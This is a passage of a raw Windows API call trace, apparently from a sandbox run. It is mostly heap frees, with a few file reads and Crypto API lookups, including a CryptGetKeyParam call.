lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.212] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0102.212] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0xb6e8, lpOverlapped=0x0) returned 1 [0102.214] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0102.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.217] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.217] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.218] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0102.219] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.219] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.220] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0102.222] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0102.223] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2a80, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a80*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b90 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.225] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0102.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.226] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.226] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.227] HeapFree (in: 